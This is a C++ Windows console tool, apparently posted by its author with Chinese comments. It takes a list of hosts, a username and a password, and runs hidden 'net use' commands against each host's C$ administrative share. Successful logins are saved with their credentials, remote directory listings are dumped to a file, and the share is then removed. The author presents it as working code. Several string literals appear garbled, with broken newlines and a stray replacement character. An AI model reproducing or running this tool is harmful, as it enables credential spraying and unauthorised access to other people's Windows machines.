// Ipc.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include <stdio.h>
#include <windows.h>
#include <stdlib.h>
struct ThreadParameter{ //结构体,传参
char Filename[MAX_PATH];
char szusername[MAX_PATH];
char szpassword[MAX_PATH];
};
bool LoginCompter(LPVOID pParam)
{
FILE* fp;
FILE* ffp;
char readbuffer[1024],savebuffer[120];
ThreadParameter *tp = (ThreadParameter *)pParam; //结构体传参
char cmd[MAX_PATH]; //保存CMD命令
char delcmd[MAX_PATH]; //删除共享字符串
char Buffer[4096]; //输出字符串
STARTUPINFO sInfo,info;
PROCESS_INFORMATION pInfo;
SECURITY_ATTRIBUTES sa;
HANDLE hRead,hWrite;
DWORD bytesRead;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
fp = fopen(tp->Filename,"rb"); //打开机器列表
if (fp == NULL)
{
printf("fopen error in %s.
",tp->Filename);
return 0;
}
ffp = fopen("suscess.txt","a+"); //打开保存结果文件
if (ffp == NULL)
{
printf("save fopen file error suscess.txt .
");
fclose(ffp);
return -1;
}
memset(readbuffer,0,sizeof(readbuffer)); //清0
while (fgets(readbuffer,sizeof(readbuffer),fp))
{
if (!CreatePipe(&hRead,&hWrite,&sa,0)) //创建匿名管道
{
printf("CreatePipe failed (%d)!
", GetLastError());
return false;
}
GetStartupInfo(&sInfo);
sInfo.cb = sizeof(sInfo);
sInfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
sInfo.wShowWindow = SW_HIDE;
sInfo.hStdError = hWrite; //将管道的写端交给子进程
sInfo.hStdOutput = hWrite;
memset(&pInfo, 0, sizeof(pInfo));
if (readbuffer[strlen(readbuffer)-1] == '
')
{
readbuffer[strlen(readbuffer) -2] = '�';
}
memset(cmd,0,sizeof(cmd));
memset(delcmd,0,sizeof(delcmd));
sprintf(cmd,"cmd.exe /c net use %s\c$ %s /u:%s",readbuffer,tp->szpassword,tp->szusername);
if(!CreateProcessA(NULL, cmd , NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOA)&sInfo, &pInfo)) //创建子进程
{
printf("CreateProcess failed (%d)!
", GetLastError());
CloseHandle(hWrite);
CloseHandle(hRead);
return false;
}
CloseHandle(hWrite); //关闭父进程的写端
while (1)
{
memset(Buffer,0,sizeof(Buffer));
memset(savebuffer,0,sizeof(savebuffer));
ReadFile(hRead,Buffer,sizeof(Buffer),&bytesRead,NULL);
if (bytesRead <= 2)
{
break;
}
if (strstr(Buffer,"successfully"))
{
char szdirPath[1024] = {0}; //临时保存
memset(szdirPath,0,sizeof(szdirPath));
sprintf(savebuffer,"Host:%s Username:%s Passwords:%s suscess
",readbuffer,tp->szusername,tp->szpassword); //输出
fwrite(savebuffer,strlen(savebuffer),1,ffp);
sprintf(szdirPath,"dir %s\c$ >> savePath.txt",readbuffer); //保存DIR目录
system(szdirPath);
sprintf(delcmd,"cmd.exe /c net use %s\c$ /del",readbuffer); //删除共享
system(delcmd);
}
}
}
fclose(fp);
fclose(ffp);
WaitForSingleObject(pInfo.hProcess, INFINITE); //等待线程退出
CloseHandle(hRead); //关闭句柄
return true;
}
int main(int argc,char* argv[])
{
ThreadParameter tp; //初始化结构体
HANDLE threadhandle;
if (argc < 4)
{
printf("[-]:%s Compute_list Username Password
",argv[0]);
return -1;
}
strcpy(tp.Filename,argv[1]); //传参
strcpy(tp.szusername,argv[2]); //传参
strcpy(tp.szpassword,argv[3]); //传参
threadhandle = CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)LoginCompter,&tp,0,0); //创建线程
if (threadhandle == INVALID_HANDLE_VALUE) //线程如果出现错误
{
printf("Create Thread error :%d
",GetLastError()); //退出
return -1;
}
WaitForSingleObject(threadhandle,INFINITE); //等待线程完成后,关闭句柄
CloseHandle(threadhandle);
return 0;
}
代码 写的很弱,但是能用。如果你对这个代码抱有强烈的批评心或者甚至是恶心的地步。还请指出来,虚心接受批评。